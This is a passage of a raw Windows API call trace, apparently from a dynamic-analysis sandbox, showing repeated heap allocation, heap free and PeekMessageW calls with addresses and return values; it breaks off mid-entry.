[0257.590] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01b68 [0257.590] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b68 | out: hHeap=0xbc0000) returned 1 [0257.590] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9ce8 | out: hHeap=0xbc0000) returned 1 [0257.590] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda648 | out: hHeap=0xbc0000) returned 1 [0257.590] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbfe2a8 | out: hHeap=0xbc0000) returned 1 [0257.590] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01988 | out: hHeap=0xbc0000) returned 1 [0257.590] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.590] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.590] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01988 [0257.590] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xbfe2a8 [0257.590] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda648 [0257.590] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01b68 [0257.590] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b68 | out: hHeap=0xbc0000) returned 1 [0257.591] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9ce8 [0257.591] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01b68 [0257.591] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b68 | out: hHeap=0xbc0000) returned 1 [0257.591] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda648 | out: hHeap=0xbc0000) returned 1 [0257.591] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9ce8 | out: hHeap=0xbc0000) returned 1 [0257.591] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbfe2a8 | out: hHeap=0xbc0000) returned 1 [0257.591] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01988 | out: hHeap=0xbc0000) returned 1 [0257.591] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9ce8 [0257.591] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda648 [0257.591] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xc01988 [0257.591] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda648 | out: hHeap=0xbc0000) returned 1 [0257.591] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01988 | out: hHeap=0xbc0000) returned 1 [0257.591] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9ce8 | out: hHeap=0xbc0000) returned 1 [0257.591] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.591] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01988 [0257.591] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xbfe2a8 [0257.591] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9ce8 [0257.591] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01b68 [0257.591] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b68 | out: hHeap=0xbc0000) returned 1 [0257.591] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda648 [0257.591] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01b68 [0257.591] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b68 | out: hHeap=0xbc0000) returned 1 [0257.591] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9ce8 | out: hHeap=0xbc0000) returned 1 [0257.591] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda648 | out: hHeap=0xbc0000) returned 1 [0257.591] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbfe2a8 | out: hHeap=0xbc0000) returned 1 [0257.591] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01988 | out: hHeap=0xbc0000) returned 1 [0257.591] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.591] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.591] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01988 [0257.591] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xbfe2a8 [0257.591] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda648 [0257.592] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01b68 [0257.592] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b68 | out: hHeap=0xbc0000) returned 1 [0257.592] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9ce8 [0257.592] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01b68 [0257.592] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b68 | out: hHeap=0xbc0000) returned 1 [0257.592] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda648 | out: hHeap=0xbc0000) returned 1 [0257.592] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9ce8 | out: hHeap=0xbc0000) returned 1 [0257.592] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbfe2a8 | out: hHeap=0xbc0000) returned 1 [0257.592] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01988 | out: hHeap=0xbc0000) returned 1 [0257.592] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9ce8 [0257.592] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda648 [0257.592] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xc01988 [0257.592] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda648 | out: hHeap=0xbc0000) returned 1 [0257.592] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01988 | out: hHeap=0xbc0000) returned 1 [0257.592] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9ce8 | out: hHeap=0xbc0000) returned 1 [0257.592] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.592] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01988 [0257.592] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xbfe2a8 [0257.592] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9ce8 [0257.592] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01b68 [0257.592] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b68 | out: hHeap=0xbc0000) returned 1 [0257.592] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda648 [0257.592] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01b68 [0257.592] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b68 | out: hHeap=0xbc0000) returned 1 [0257.592] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9ce8 | out: hHeap=0xbc0000) returned 1 [0257.592] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda648 | out: hHeap=0xbc0000) returned 1 [0257.592] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbfe2a8 | out: hHeap=0xbc0000) returned 1 [0257.592] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01988 | out: hHeap=0xbc0000) returned 1 [0257.592] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.592] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.592] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01988 [0257.592] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xbfe2a8 [0257.592] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda648 [0257.592] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01b68 [0257.592] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b68 | out: hHeap=0xbc0000) returned 1 [0257.593] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9ce8 [0257.593] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01b68 [0257.593] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b68 | out: hHeap=0xbc0000) returned 1 [0257.593] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda648 | out: hHeap=0xbc0000) returned 1 [0257.593] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9ce8 | out: hHeap=0xbc0000) returned 1 [0257.593] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbfe2a8 | out: hHeap=0xbc0000) returned 1 [0257.593] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01988 | out: hHeap=0xbc0000) returned 1 [0257.593] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9ce8 [0257.593] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda648 [0257.593] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xc01988 [0257.593] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x30) returned 0xcdf350 [0257.593] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda630 | out: hHeap=0xbc0000) returned 1 [0257.593] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda648 | out: hHeap=0xbc0000) returned 1 [0257.593] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01988 | out: hHeap=0xbc0000) returned 1 [0257.593] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9ce8 | out: hHeap=0xbc0000) returned 1 [0257.593] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.593] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01988 [0257.593] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xbfe2a8 [0257.593] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9ce8 [0257.593] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01b68 [0257.593] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b68 | out: hHeap=0xbc0000) returned 1 [0257.593] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda648 [0257.593] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01b68 [0257.593] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b68 | out: hHeap=0xbc0000) returned 1 [0257.593] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9ce8 | out: hHeap=0xbc0000) returned 1 [0257.593] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda648 | out: hHeap=0xbc0000) returned 1 [0257.593] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbfe2a8 | out: hHeap=0xbc0000) returned 1 [0257.593] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01988 | out: hHeap=0xbc0000) returned 1 [0257.593] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.593] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc3d620 | out: hHeap=0xbc0000) returned 1 [0257.593] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.593] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.593] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01988 [0257.593] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xbfe2a8 [0257.593] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda648 [0257.594] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01b68 [0257.594] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b68 | out: hHeap=0xbc0000) returned 1 [0257.594] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9ce8 [0257.594] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01b68 [0257.594] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b68 | out: hHeap=0xbc0000) returned 1 [0257.594] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda630 [0257.594] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01b68 [0257.594] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b68 | out: hHeap=0xbc0000) returned 1 [0257.594] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xc01b68 [0257.594] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01b18 [0257.594] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01b28 [0257.594] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x1) returned 0xc01b48 [0257.594] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b68 | out: hHeap=0xbc0000) returned 1 [0257.594] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b18 | out: hHeap=0xbc0000) returned 1 [0257.594] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda648 | out: hHeap=0xbc0000) returned 1 [0257.594] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9ce8 | out: hHeap=0xbc0000) returned 1 [0257.594] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda630 | out: hHeap=0xbc0000) returned 1 [0257.594] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbfe2a8 | out: hHeap=0xbc0000) returned 1 [0257.594] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01988 | out: hHeap=0xbc0000) returned 1 [0257.594] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01988 [0257.594] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x1) returned 0xc01b18 [0257.594] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b48 | out: hHeap=0xbc0000) returned 1 [0257.594] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b28 | out: hHeap=0xbc0000) returned 1 [0257.594] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.594] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01b28 [0257.594] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b28 | out: hHeap=0xbc0000) returned 1 [0257.594] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01b28 [0257.594] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b28 | out: hHeap=0xbc0000) returned 1 [0257.594] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x38) returned 0xc3d620 [0257.594] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.594] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01b28 [0257.594] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xbfe2a8 [0257.594] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda630 [0257.594] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01b48 [0257.595] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01b68 [0257.595] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x1) returned 0xc01b38 [0257.595] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b48 | out: hHeap=0xbc0000) returned 1 [0257.595] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9ce8 [0257.595] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01b48 [0257.595] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b48 | out: hHeap=0xbc0000) returned 1 [0257.595] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b38 | out: hHeap=0xbc0000) returned 1 [0257.595] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b68 | out: hHeap=0xbc0000) returned 1 [0257.595] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda630 | out: hHeap=0xbc0000) returned 1 [0257.595] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9ce8 | out: hHeap=0xbc0000) returned 1 [0257.595] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbfe2a8 | out: hHeap=0xbc0000) returned 1 [0257.595] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b28 | out: hHeap=0xbc0000) returned 1 [0257.595] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9ce8 [0257.595] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda630 [0257.595] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xc01b28 [0257.595] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda630 | out: hHeap=0xbc0000) returned 1 [0257.595] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b28 | out: hHeap=0xbc0000) returned 1 [0257.595] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9ce8 | out: hHeap=0xbc0000) returned 1 [0257.595] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.595] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01b28 [0257.595] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xbfe2a8 [0257.595] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9ce8 [0257.595] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01b68 [0257.595] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01b38 [0257.595] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x1) returned 0xc01b48 [0257.595] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b68 | out: hHeap=0xbc0000) returned 1 [0257.595] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda630 [0257.595] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01b68 [0257.595] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b68 | out: hHeap=0xbc0000) returned 1 [0257.595] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b48 | out: hHeap=0xbc0000) returned 1 [0257.595] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b38 | out: hHeap=0xbc0000) returned 1 [0257.595] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9ce8 | out: hHeap=0xbc0000) returned 1 [0257.595] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda630 | out: hHeap=0xbc0000) returned 1 [0257.596] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbfe2a8 | out: hHeap=0xbc0000) returned 1 [0257.596] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b28 | out: hHeap=0xbc0000) returned 1 [0257.596] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b18 | out: hHeap=0xbc0000) returned 1 [0257.596] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01988 | out: hHeap=0xbc0000) returned 1 [0257.596] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.596] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.596] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01988 [0257.596] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xbfe2a8 [0257.596] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda630 [0257.596] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01b18 [0257.596] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b18 | out: hHeap=0xbc0000) returned 1 [0257.596] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9ce8 [0257.596] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01b18 [0257.596] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b18 | out: hHeap=0xbc0000) returned 1 [0257.596] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda630 | out: hHeap=0xbc0000) returned 1 [0257.596] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9ce8 | out: hHeap=0xbc0000) returned 1 [0257.596] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbfe2a8 | out: hHeap=0xbc0000) returned 1 [0257.596] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01988 | out: hHeap=0xbc0000) returned 1 [0257.596] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9ce8 [0257.596] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda630 [0257.596] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xc01988 [0257.596] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda630 | out: hHeap=0xbc0000) returned 1 [0257.596] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01988 | out: hHeap=0xbc0000) returned 1 [0257.596] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9ce8 | out: hHeap=0xbc0000) returned 1 [0257.596] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.596] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01988 [0257.596] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.596] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.597] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.597] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.597] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.597] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.597] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.597] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.597] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.597] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.597] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.597] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.597] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.597] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.597] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: 